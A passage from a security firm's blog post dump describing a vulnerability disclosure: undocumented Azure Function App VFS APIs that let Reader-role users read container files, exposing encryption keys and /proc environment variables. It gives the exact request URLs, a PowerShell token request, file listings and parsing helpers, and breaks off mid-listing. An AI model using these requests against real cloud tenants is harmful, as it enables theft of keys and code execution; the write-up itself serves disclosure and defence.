[post_title] => What the Function: Decrypting Azure Function App Keys [post_excerpt] => When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => what-the-function-decrypting-azure-function-app-keys [to_ping] => [pinged] => [post_modified] => 2023-08-08 09:25:11 [post_modified_gmt] => 2023-08-08 14:25:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=30784 [menu_order] => 73 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw )

[7] => WP_Post Object ( [ID] => 29749 [post_author] => 10 [post_date] => 2023-03-23 08:24:36 [post_date_gmt] => 2023-03-23 13:24:36 [post_content] =>

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers.

TL;DR

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.

- For the Windows containers, this resulted in access to ASP.NET encryption keys.

- For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container.

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.





The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions.



Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with.

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.
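Since the same URL shape is reused for every request in this post, it can help to build it in one place. The following is a minimal Python sketch that only assembles the string and sends nothing. The helper name `vfs_url` and its parameter names are hypothetical; the path layout, the `relativePath` parameter, and the `2021-01-15` API version are taken from the example URL above.

```python
from urllib.parse import quote

MGMT_HOST = "https://management.azure.com"


def vfs_url(sub_id, resource_group, app_name, path="",
            relative_path=1, api_version="2021-01-15"):
    """Build a hostruntime VFS URL in the same shape as the example above."""
    # Percent-encode the path but keep "/" so nested directories stay readable.
    encoded = quote(path.lstrip("/"), safe="/")
    return (
        f"{MGMT_HOST}/subscriptions/{sub_id}/resourceGroups/{resource_group}"
        f"/providers/Microsoft.Web/sites/{app_name}/hostruntime/admin/vfs//{encoded}"
        f"?relativePath={relative_path}&api-version={api_version}"
    )
```

For example, `vfs_url(sub_id, "tester", "vfspoc")` reproduces the listing URL above, and passing `path="HttpTrigger1/"` would target that function's directory.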

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/HttpTrigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”.
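To illustrate why directories do not hide anything from the API, here is a minimal Python sketch that walks a VFS listing recursively. It assumes a hypothetical callable `list_dir(path)` that returns the parsed JSON listing for a directory (a list of entries with the `name`, `mime`, and `path` fields shown in the output above). How that callable authenticates and fetches the listing is left out on purpose.

```python
def walk_vfs(list_dir, path="", max_depth=5):
    """Yield the 'path' of every file under `path`, descending into directories.

    Lists the starting directory and at most `max_depth` levels beneath it.
    """
    if max_depth < 0:
        return
    for entry in list_dir(path):
        if entry["mime"] == "inode/directory":
            # Directories are reported with the inode/directory MIME type.
            yield from walk_vfs(list_dir, f"{path}{entry['name']}/", max_depth - 1)
        else:
            yield entry["path"]
```

The depth limit is a design choice in this sketch, so that a deep or self-referencing directory tree cannot make the walk run indefinitely.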

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"}).Content | ConvertFrom-Json

name : data

size : 0

mtime : 2022-09-12T20:20:48.2362984+00:00

crtime : 2022-09-12T20:20:48.2362984+00:00

mime : inode/directory

href : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?relativePath=0&api-version=2021-01-15

path : D:\home\data

name : LogFiles

size : 0

mtime : 2022-09-12T20:20:02.5561162+00:00

crtime : 2022-09-12T20:20:02.5561162+00:00

mime : inode/directory

href : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2F?relativePath=0&api-version=2021-01-15

path : D:\home\LogFiles

name : site

size : 0

mtime : 2022-09-12T20:20:02.5701081+00:00

crtime : 2022-09-12T20:20:02.5701081+00:00

mime : inode/directory

href : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?relativePath=0&api-version=2021-01-15

path : D:\home\site

name : ASP.NET

size : 0

mtime : 2022-09-12T20:20:48.2362984+00:00

crtime : 2022-09-12T20:20:48.2362984+00:00

mime : inode/directory

href : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F?relativePath=0&api-version=2021-01-15

path : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses XML files with the encryption keys for the application.

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3fb5.xml?relativePath=0&api-version=2018-11-01

<?xml version="1.0" encoding="utf-8"?>

<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1">

<creationDate>2022-03-29T11:23:34.5455524Z</creationDate>

<activationDate>2022-03-29T11:23:34.2303392Z</activationDate>

<expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate>

<descriptor deserializerType="Microsoft.AspNetCore.DataProtection.AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptorDescriptorDeserializer, Microsoft.AspNetCore.DataProtection, Version=3.1.18.0, Culture=neutral, PublicKeyToken=ace99892819abce50">

<descriptor>

<encryption algorithm="AES_256_CBC" />

<validation algorithm="HMACSHA256" />

<masterKey p4:requiresEncryption="true" xmlns:p4="https://schemas.asp.net/2015/03/dataProtection">

<!-- Warning: the key below is in an unencrypted form. -->

<value>a5[REDACTED]==</value>

</masterKey>

</descriptor>

</descriptor>

</key>

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.
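When several key files are present, a quick summary makes it easier to see which keys are still active and whether the master key is stored in cleartext. The following is a minimal Python sketch, assuming the key file has the same element layout as the example above. The function name `summarize_key` and the returned field names are hypothetical, and the sketch does not attempt any decryption.

```python
import xml.etree.ElementTree as ET


def summarize_key(xml_text):
    """Pull the identifying fields out of a DataProtection key file."""
    root = ET.fromstring(xml_text)
    # The algorithm settings live in the nested <descriptor><descriptor> element.
    inner = root.find("./descriptor/descriptor")
    return {
        "id": root.get("id"),
        "activation": root.findtext("activationDate"),
        "expiration": root.findtext("expirationDate"),
        "encryption": inner.find("encryption").get("algorithm"),
        "validation": inner.find("validation").get("algorithm"),
        # True when a <value> element sits directly under <masterKey>.
        "has_cleartext_master_key": inner.find("masterKey/value") is not None,
    }
```

Dates are returned as the raw strings from the file, so comparing them against the current time is left to the caller.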



Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15

JSON output parsed into a PowerShell object:

name : lost+found

size : 0

mtime : 1970-01-01T00:00:00+00:00

crtime : 1970-01-01T00:00:00+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15

path : /lost+found

[Truncated]

name : proc

size : 0

mtime : 2022-09-14T22:28:57.5032138+00:00

crtime : 2022-09-14T22:28:57.5032138+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15

path : /proc

[Truncated]

name : tmp

size : 0

mtime : 2022-09-14T22:56:33.6638983+00:00

crtime : 2022-09-14T22:56:33.6638983+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15

path : /tmp

name : usr

size : 0

mtime : 2022-09-02T21:47:36+00:00

crtime : 1970-01-01T00:00:00+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15

path : /usr

name : var

size : 0

mtime : 2022-09-03T21:23:43+00:00

crtime : 2022-09-03T21:23:43+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15



path : /var Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.
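As a rough illustration of the proc technique, the Python sketch below picks the numeric (PID) directories out of a parsed VFS listing of /proc and splits the contents of an `environ` file into variables. On Linux, `/proc/<pid>/environ` holds the process environment as NUL-separated `KEY=value` entries. The function names are hypothetical, and the listing is assumed to be a list of entries with the `name` and `mime` fields seen in the outputs in this post.

```python
def pid_environ_paths(proc_listing):
    """Return /proc/<pid>/environ paths for the numeric directory entries."""
    pids = sorted(
        int(entry["name"])
        for entry in proc_listing
        if entry["mime"] == "inode/directory" and entry["name"].isdecimal()
    )
    return [f"/proc/{pid}/environ" for pid in pids]


def parse_environ(raw):
    """Split NUL-separated environ bytes into a dict of variables."""
    env = {}
    for item in raw.split(b"\x00"):
        if b"=" in item:
            # Split on the first "=" only, since values may contain "=".
            key, _, value = item.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env
```

Retrieving the file contents is deliberately left out; these helpers only cover selecting candidate paths and parsing what comes back.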

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15

JSON output parsed into a PowerShell object:

name : fs

size : 0

mtime : 2022-09-21T22:00:39.3885209+00:00

crtime : 2022-09-21T22:00:39.3885209+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15

path : /proc/fs

name : bus

size : 0

mtime : 2022-09-21T22:00:39.3895209+00:00

crtime : 2022-09-21T22:00:39.3895209+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15

path : /proc/bus

[Truncated]

name : 1

size : 0

mtime : 2022-09-21T22:00:38.2025209+00:00

crtime : 2022-09-21T22:00:38.2025209+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15

path : /proc/1

name : 16

size : 0

mtime : 2022-09-21T22:00:38.2025209+00:00

crtime : 2022-09-21T22:00:38.2025209+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15

path : /proc/16

[Truncated]

name : 59

size : 0

mtime : 2022-09-21T22:00:38.6785209+00:00

crtime : 2022-09-21T22:00:38.6785209+00:00

mime : inode/directory

href : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15

path : /proc/59

name : 1113

size : 0

mtime : 2022-09-21T22:16:09.1248576+00:00